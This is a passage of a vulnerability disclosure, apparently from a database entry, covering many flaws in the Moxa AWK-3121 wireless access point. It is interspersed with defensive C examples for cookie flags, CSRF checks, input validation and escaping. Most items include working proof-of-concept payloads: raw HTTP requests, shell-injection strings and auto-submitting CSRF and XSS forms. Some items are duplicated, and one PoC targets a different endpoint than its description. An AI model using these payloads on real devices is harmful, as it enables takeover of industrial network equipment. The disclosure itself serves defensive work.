... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and trigger the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
13.
The device provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. The POST parameter "iw_filename" is susceptible to command
injection via shell metacharacters.
------------------------------------------
[Additional Information]
POC
<html>
<body>
<script>
function submitRequest()
{
var formData = new FormData();
formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user
formData.append("certFile1", "test.txt");
// JavaScript file-like object
var content = '<a id="a"><b id="b">hey!</b></a>'; // the body of the new file...
var blob = new Blob([content], { type: "text/xml"});
formData.append("certFile", blob);
var request = new XMLHttpRequest();
request.open("POST", "http://192.168.127.253/forms/web_certUpload");
request.send(formData);
}
</script>
<form action="#">
<input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
------------------------------------------
[VulnerabilityType Other]
Command injection in web runscript functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
14.
The device provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. The POST parameter "iw_serverip" is susceptible to a buffer
overflow.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="XXXX"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
AAAAAAAAAAAAAAAAAA (etc.)
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and trigger the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
| VAR-201906-0780 | CVE-2018-10690 | Moxa AWK-3121 Vulnerabilities related to certificate and password management in devices |
CVSS V2: 4.3 CVSS V3: 8.1 Severity: HIGH |
An issue was discovered on Moxa AWK-3121 1.14 devices. The device by default allows HTTP traffic, thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and to compromise sensitive data such as credentials. The Moxa AWK-3121 device contains vulnerabilities related to certificate and password management. Information may be obtained or altered, and the device may be put into a denial-of-service (DoS) state. Moxa AWK-3121 is an industrial-grade wireless access point from Moxa Corporation of Taiwan, China. An information disclosure vulnerability exists in Moxa's AWK-3121 1.14 release.
------------------------------------------
[VulnerabilityType Other]
HTTP traffic by default
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
2.
It is intended that an administrator can download /systemlog.log (the system
log). However, the same functionality allows an attacker to download
the file without any authentication or authorization.
------------------------------------------
[Additional Information]
POC
http://192.168.127.253//systemlog.log
------------------------------------------
[Vulnerability Type]
Incorrect Access Control
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can navigate to the URL and download the system log file without any authentication or authorization
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
3.
The session cookie "Password508" does not have an HttpOnly flag.
------------------------------------------
[VulnerabilityType Other]
Missing HttpOnly flag on session cookie
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can use a cross-site scripting attack to access the session cookie "Password508", which can allow the attacker to log in to the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
4.
It provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly.
However, the same functionality allows an attacker to execute commands
on the device. The POST parameter "srvName" is susceptible to a buffer
overflow. By crafting a packet that contains a string of
516 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0
srvName=AAAAAA (etc.) EEEEEE&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and trigger a buffer overflow on the device
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
5.
The device provides a Wi-Fi connection that is open and does not use
any encryption mechanism by default. An administrator who uses the
open wireless connection to set up the device can allow an
attacker to sniff the traffic passing between the user's computer and the
device. Also an attacker
can MITM the response and infect a user's computer very easily as
well.
------------------------------------------
[VulnerabilityType Other]
Open WiFi Connection
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Device
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can monitor the Wi-Fi channels using Kismet or some other
open-source software and a wireless card in monitor mode and sniff all
the traffic, including HTTP traffic as well as SSH and Telnet traffic.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
6.
It provides alert functionality so that an
administrator can send emails to his/her account when there are
changes to the device's network. However, the same functionality allows
an attacker to execute commands on the device. The POST parameters
"to1,to2,to3,to4" are all susceptible to buffer overflow. By crafting
a packet that contains a string of 678 characters, it is
possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_SendTestEmail HTTP/1.1
Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f
server=server.mail.com&username=test&password=test&from=test@mail.com&to1=AAAAAAAAAA (etc.)
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and trigger the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
7.
The device provides a web interface to allow an administrator to
manage the device. However, this interface is not protected against
CSRF attacks, which allows an attacker to trick an administrator into
executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and
forms/webSetMainRestart URIs.
------------------------------------------
[Additional Information]
POC to change name of the device
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="iw_board_deviceName" value="AWK-ROMEO" />
<input type="hidden" name="iw_board_deviceLocation" value="" />
<input type="hidden" name="iw_board_deviceDescription" value="" />
<input type="hidden" name="iw_board_deviceContactInfo" value="" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="bkpath" value="/sysinfo.asp " />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/webSetMainRestart" method="GET" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="SaveValue" value="1" />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
------------------------------------------
[Vulnerability Type]
Cross Site Request Forgery (CSRF)
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can trick an administrator of the device into visiting an
attacker-controlled page while connected to the network, and thereby
change the password or any other setting
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
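Added example (not code from Moxa's firmware or the GoAhead server) of the two server-side controls that items 3 and 7 show to be absent: a Set-Cookie line for Password508 carrying HttpOnly, and a check that accepts a state-changing form only as a POST from the device's own origin with the session's CSRF token. The origin policy, the token format and all function names are assumptions made for this example.

```c
/* Added example, not code from the Moxa AWK-3121 firmware or GoAhead.
 * Item 3: the session cookie is sent without HttpOnly, so script can read it.
 * Item 7: forms/iw_webSetParameters (POST) and forms/webSetMainRestart (GET)
 * accept any request the browser is tricked into sending.
 * Below, the cookie is emitted with HttpOnly and SameSite, and a state change
 * requires POST + matching Origin + a per-session CSRF token. The policy
 * details and names are assumptions made for this example. */
#include <stdio.h>
#include <string.h>

#define TOKEN_BYTES 16

char g_hdr[256];                           /* scratch buffer for main()/tests */

/* Set-Cookie line with HttpOnly (script cannot read it) and SameSite=Strict
 * as a second CSRF barrier. Add "; Secure" once the UI is HTTPS-only.
 * Returns 0, or -1 when the line does not fit in dst. */
int format_session_cookie(char *dst, size_t dstsz, const char *value) {
    int n = snprintf(dst, dstsz,
                     "Set-Cookie: Password508=%s; Path=/; HttpOnly; SameSite=Strict",
                     value);
    return (n < 0 || (size_t)n >= dstsz) ? -1 : 0;
}

/* Fresh per-session token from /dev/urandom, hex-encoded. 0 on success. */
int new_csrf_token(char *hex, size_t hexsz) {
    unsigned char raw[TOKEN_BYTES];
    FILE *f;
    size_t i;
    if (hexsz < 2 * TOKEN_BYTES + 1) return -1;
    f = fopen("/dev/urandom", "rb");
    if (f == NULL) return -1;
    i = fread(raw, 1, sizeof raw, f);
    fclose(f);
    if (i != sizeof raw) return -1;
    for (i = 0; i < sizeof raw; i++) snprintf(hex + 2 * i, 3, "%02x", raw[i]);
    return 0;
}

/* Constant-time equality so a token cannot be guessed byte by byte. */
static int ct_equal(const char *a, const char *b) {
    size_t la = strlen(a), lb = strlen(b), i;
    unsigned char d = (unsigned char)(la != lb);
    for (i = 0; i < la && i < lb; i++) d |= (unsigned char)(a[i] ^ b[i]);
    return d == 0;
}

typedef enum {
    CSRF_OK = 0,
    CSRF_METHOD_NOT_POST,
    CSRF_ORIGIN_MISMATCH,
    CSRF_TOKEN_MISSING,
    CSRF_TOKEN_MISMATCH
} csrf_result;

/* Decide whether a state-changing request may proceed.
 * method / origin_hdr / form_token come from the request (NULL when absent);
 * own_origin is the scheme://host[:port] the UI is served from;
 * session_token is the token stored with the Password508 session. */
csrf_result state_change_allowed(const char *method, const char *origin_hdr,
                                 const char *own_origin,
                                 const char *form_token, const char *session_token) {
    if (method == NULL || strcmp(method, "POST") != 0)
        return CSRF_METHOD_NOT_POST;      /* GET must never change state */
    if (origin_hdr == NULL || strcmp(origin_hdr, own_origin) != 0)
        return CSRF_ORIGIN_MISMATCH;      /* cross-site page, or no Origin at all */
    if (form_token == NULL || form_token[0] == '\0')
        return CSRF_TOKEN_MISSING;        /* the PoC forms carry no token */
    if (session_token == NULL || !ct_equal(form_token, session_token))
        return CSRF_TOKEN_MISMATCH;
    return CSRF_OK;
}

int main(void) {
    char tok[2 * TOKEN_BYTES + 1];
    const char *own = "http://192.168.127.253";   /* device address from the PoC */
    if (new_csrf_token(tok, sizeof tok) != 0) return 1;
    if (format_session_cookie(g_hdr, sizeof g_hdr, "session-id-placeholder") == 0)
        puts(g_hdr);
    /* Constructed requests: the PoC's GET restart, a token-less cross-site
     * POST, and a legitimate POST from the UI's own page. */
    printf("GET restart:     %d\n", state_change_allowed("GET", own, own, NULL, tok));
    printf("cross-site POST: %d\n",
           state_change_allowed("POST", "http://attacker.example", own, NULL, tok));
    printf("POST with token: %d\n", state_change_allowed("POST", own, own, tok, tok));
    return 0;
}
```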
8.
The Moxa AWK 3121 provides ping functionality so that an administrator
can execute ICMP calls to check if the network is working correctly.
However, the same functionality allows an attacker to execute commands
on the device. The POST parameter "srvName" is susceptible to this
injection. By crafting a packet that contains shell metacharacters,
it is possible for an attacker to
execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/webSetPingTrace HTTP/1.1
Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333
srvName=192.168.127.102;ping -c 8 192.168.127.101;##&option=0&bkpath=%2Fping_trace.asp
------------------------------------------
[VulnerabilityType Other]
Command injection in Ping functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK 3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
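Added example (not code from Moxa's firmware or the GoAhead server) showing how a ping handler can take the srvName value from items 4 and 8 safely: a length bound, a character allow-list that rejects shell metacharacters, and an argv-based launch of ping so that no shell ever parses the value. The 253-character bound and all function names are assumptions made here.

```c
/* Added example, not code from the Moxa AWK-3121 firmware or GoAhead.
 * Safe handling of a ping-target parameter (the advisory's "srvName"):
 * 1. bound its length before it reaches any fixed-size buffer (item 4
 *    reports an overflow with a 516-character value);
 * 2. allow only hostname/IP characters, so the ';', '`', '#' and spaces
 *    of the item 8 PoC are rejected before any command is built;
 * 3. run ping through execvp() with an argument vector, never via a shell.
 * The limits and names below are assumptions made for this example. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define SRVNAME_MAX 253            /* assumed bound: longest DNS hostname */

typedef enum {
    TARGET_OK = 0,
    TARGET_EMPTY,
    TARGET_TOO_LONG,
    TARGET_BAD_CHAR
} target_status;

/* Scratch buffers used by main() and by tests; the checks do not need them. */
char g_target[SRVNAME_MAX + 1];
static char g_filler[1024];

/* Constructed sample value: n copies of c, mimicking the overflow PoC. */
const char *sample_filler(char c, size_t n) {
    if (n >= sizeof g_filler) n = sizeof g_filler - 1;
    memset(g_filler, c, n);
    g_filler[n] = '\0';
    return g_filler;
}

/* Characters a hostname or IPv4/IPv6 literal may contain; nothing else. */
static int allowed_target_char(unsigned char c) {
    return isalnum(c) || c == '.' || c == '-' || c == ':';
}

target_status validate_ping_target(const char *s) {
    size_t i, n;
    if (s == NULL || s[0] == '\0') return TARGET_EMPTY;
    n = strlen(s);
    if (n > SRVNAME_MAX) return TARGET_TOO_LONG;
    if (s[0] == '-') return TARGET_BAD_CHAR;   /* would parse as a ping option */
    for (i = 0; i < n; i++)
        if (!allowed_target_char((unsigned char)s[i])) return TARGET_BAD_CHAR;
    return TARGET_OK;
}

/* Copy a validated target into a fixed buffer; refuses anything that does
 * not fit, which is the check an overflowing handler lacks. 0 on success. */
int copy_ping_target(char *dst, size_t dstsz, const char *src) {
    size_t n;
    if (dst == NULL || dstsz == 0 || validate_ping_target(src) != TARGET_OK)
        return -1;
    n = strlen(src);
    if (n >= dstsz) return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

/* Launch ping with the target as one argv element. argv goes straight to
 * the binary, so shell metacharacters have no meaning here. Returns ping's
 * exit status, or -1 if the target is rejected or the launch fails. */
int run_ping(const char *target, int count) {
    char countbuf[16];
    char *argv[5];
    pid_t pid;
    int status;

    if (validate_ping_target(target) != TARGET_OK || count < 1 || count > 10)
        return -1;
    snprintf(countbuf, sizeof countbuf, "%d", count);
    argv[0] = "ping";
    argv[1] = "-c";
    argv[2] = countbuf;
    argv[3] = (char *)target;
    argv[4] = NULL;

    pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);                /* exec failed in the child */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed inputs: a normal target, the injection string from the
     * item 8 PoC, and a 516-byte filler like the item 4 PoC. */
    const char *inputs[] = {
        "192.168.127.102",
        "192.168.127.102;ping -c 8 192.168.127.101;##",
        sample_filler('A', 516),
    };
    for (size_t i = 0; i < 3; i++)
        printf("input %zu -> status %d\n", i, validate_ping_target(inputs[i]));
    return 0;
}
```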
9.
The device enables an unencrypted TELNET service by default. Also an attacker can easily
connect to the TELNET daemon using the default credentials if they have
not been changed by the user.
------------------------------------------
[VulnerabilityType Other]
Insecure service Telnet enabled by default
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Telnet daemon
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
An attacker can sniff the traffic passing between the device and the user by using a MITM attack such as ARP poisoning
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
10.
The Moxa AWK 3121 provides certfile upload functionality so that an
administrator can upload a certificate file used for connecting to the
wireless network. However, the same functionality allows an attacker
to execute commands on the device. The POST parameter "iw_privatePass"
is susceptible to this injection. By crafting a packet that contains shell metacharacters,
it is possible
for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_certUpload HTTP/1.1
Cookie: Password508=68abf30ef8176a4248320929e04df562
... 114782935826962
Content-Disposition: form-data; name="iw_privatePass"
;`ping -c 9 192.168.127.103` ##
... 114782935826962
Content-Disposition: form-data; name="bkpath"
/wireless_cert.asp?index=1
... 114782935826962
Content-Disposition: form-data; name="certSection"
certWlan
... 114782935826962
Content-Disposition: form-data; name="rfindex"
0
... 114782935826962
Content-Disposition: form-data; name="Submit"
Submit
... 114782935826962
Content-Disposition: form-data; name="certFile1"
test.txt
... 114782935826962
Content-Disposition: form-data; name="certFile"; filename="blob"
Content-Type: text/xml
<a id="a"><b id="b">hey!</b></a>
... 114782935826962--
------------------------------------------
[VulnerabilityType Other]
Command injection in file upload
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
11. The device
provides functionality so that an administrator can change the
name of the device. However, the same functionality allows an attacker
to execute XSS by injecting an XSS payload. The POST parameter
"iw_board_deviceName" is susceptible to this injection.
------------------------------------------
[Additional Information]
POC
<html>
<body>
<form id="f" action="http://192.168.127.253/forms/iw_webSetParameters" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="iw_board_deviceName" value="AWK<\/td');alert(1);//" />
<input type="hidden" name="iw_board_deviceLocation" value="" />
<input type="hidden" name="iw_board_deviceDescription" value="" />
<input type="hidden" name="iw_board_deviceContactInfo" value="" />
<input type="hidden" name="Submit" value="Submit" />
<input type="hidden" name="bkpath" value="/sysinfo.asp " />
</form>
<script>
setTimeout("document.forms['f'].submit();",1);
</script>
</body>
</html>
------------------------------------------
[Vulnerability Type]
Cross Site Scripting (XSS)
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.9
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Escalation of Privileges]
true
------------------------------------------
[Impact Information Disclosure]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and execute a stored XSS on the device.
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
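Added example (not code from Moxa's firmware or the GoAhead server) for item 11: an input allow-list for iw_board_deviceName and output encoders for the HTML and JavaScript-string contexts the PoC payload breaks out of. The character set, the 63-character bound and the function names are assumptions made here.

```c
/* Added example, not code from the Moxa AWK-3121 firmware or GoAhead.
 * Stored XSS through the device name (item 11) needs two things to go
 * wrong: the name is accepted with markup characters, and it is later
 * written into a page without encoding for the context it lands in. The
 * PoC value  AWK<\/td');alert(1);//  ends a JavaScript string literal and
 * closes a <td>. Below: an input allow-list for iw_board_deviceName and two
 * output encoders, one for HTML text and one for JavaScript string literals.
 * Limits, names and the chosen character set are assumptions for this example. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define DEVNAME_MAX 63            /* assumed bound for the device name */

char g_out[512];                  /* scratch output buffer for main()/tests */

/* Accept only letters, digits, space, '.', '-' and '_' for the name. */
int validate_device_name(const char *s) {
    size_t i, n;
    if (s == NULL) return 0;
    n = strlen(s);
    if (n == 0 || n > DEVNAME_MAX) return 0;
    for (i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == ' ' || c == '.' || c == '-' || c == '_'))
            return 0;
    }
    return 1;
}

/* Append src to dst at *pos; returns 0, or -1 when dst would overflow. */
static int put(char *dst, size_t dstsz, size_t *pos, const char *src) {
    size_t n = strlen(src);
    if (*pos + n >= dstsz) return -1;
    memcpy(dst + *pos, src, n);
    *pos += n;
    dst[*pos] = '\0';
    return 0;
}

/* Encode for HTML text or attribute context: the five significant chars. */
int html_escape(char *dst, size_t dstsz, const char *src) {
    size_t pos = 0;
    char one[2] = {0, 0};
    if (dstsz == 0) return -1;
    dst[0] = '\0';
    for (; *src; src++) {
        const char *rep;
        switch (*src) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   one[0] = *src; rep = one; break;
        }
        if (put(dst, dstsz, &pos, rep) < 0) return -1;
    }
    return 0;
}

/* Encode for a JavaScript string literal: everything outside a conservative
 * allow-list becomes \xHH, so quotes, backslashes, '<', '/' and ';' can
 * neither end the literal nor form a closing tag. Bytes >= 0x80 (UTF-8) pass. */
int js_string_escape(char *dst, size_t dstsz, const char *src) {
    size_t pos = 0;
    char buf[8];
    if (dstsz == 0) return -1;
    dst[0] = '\0';
    for (; *src; src++) {
        unsigned char c = (unsigned char)*src;
        if (isalnum(c) || c == ' ' || c == '.' || c == '-' || c == '_' ||
            c == ':' || c >= 0x80) {
            buf[0] = (char)c;
            buf[1] = '\0';
        } else {
            snprintf(buf, sizeof buf, "\\x%02x", c);
        }
        if (put(dst, dstsz, &pos, buf) < 0) return -1;
    }
    return 0;
}

int main(void) {
    /* The PoC device name from the advisory, as a C string literal. */
    const char *poc = "AWK<\\/td');alert(1);//";
    printf("accepted at input: %d\n", validate_device_name(poc));
    if (html_escape(g_out, sizeof g_out, poc) == 0) printf("html: %s\n", g_out);
    if (js_string_escape(g_out, sizeof g_out, poc) == 0) printf("js:   %s\n", g_out);
    return 0;
}
```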
12.
The device provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. However,
the same functionality allows an attacker to execute commands on the
device. The POST parameter "iw_filename" is susceptible to a buffer
overflow. By crafting a packet that contains a string of
162 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=071b1093656adca3510d5e32f69737ec
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
`ping -c 3 192.168.127.101`
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use an XSRF form to trick an admin into submitting the request and trigger the buffer overflow
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
13.
The device provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. However,
the same functionality allows an attacker to execute commands on the
device. The POST parameter "iw_filename" is susceptible to command
injection via shell metacharacters.
------------------------------------------
[Additional Information]
POC
<html>
<body>
<script>
function submitRequest()
{
var formData = new FormData();
formData.append("iw_filename", ";`ping -c 9 192.168.127.103` ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user
formData.append("certFile1", "test.txt");
// JavaScript file-like object
var content = '<a id="a"><b id="b">hey!</b></a>'; // the body of the new file...
var blob = new Blob([content], { type: "text/xml"});
formData.append("certFile", blob);
var request = new XMLHttpRequest();
request.open("POST", "http://192.168.127.253/forms/web_certUpload");
request.send(formData);
}
</script>
<form action="#">
<input type="submit" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
------------------------------------------
[VulnerabilityType Other]
Command injection in web runscript functionality
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
------------------------------------------
[Affected Component]
Web Server -- iw_webs (Goahead)
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Attack Vectors]
Use XSRF form to trick an admin into submitting the request
------------------------------------------
[Reference]
https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
------------------------------------------
[Discoverer]
Samuel Huntley
14.
It provides functionality so that an administrator
can run scripts on the device to troubleshoot any issues. However,
the same functionality allows an attacker to execute commands on the
device. The POST parameter "iw_serverip" is susceptible to buffer
overflow. By crafting a packet that contains a string of
480 characters, it is possible for an attacker to execute the attack.
------------------------------------------
[Additional Information]
POC
POST /forms/web_runScript HTTP/1.1
Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_filename"; filename="XXXX"
Content-Type: application/octet-stream
ls -ltr
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_storage"
tftp
... 7e21a62f2905ca
Content-Disposition: form-data; name="iw_serverip"
AAAAAAAAAAAAAAAAAA (etc.)
... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp
... 7e21a62f2905ca--
------------------------------------------
[Vulnerability Type]
Buffer Overflow
------------------------------------------
[Vendor of Product]
Moxa
------------------------------------------
[Affected Product Code Base]
AWK-3121 - 1.14
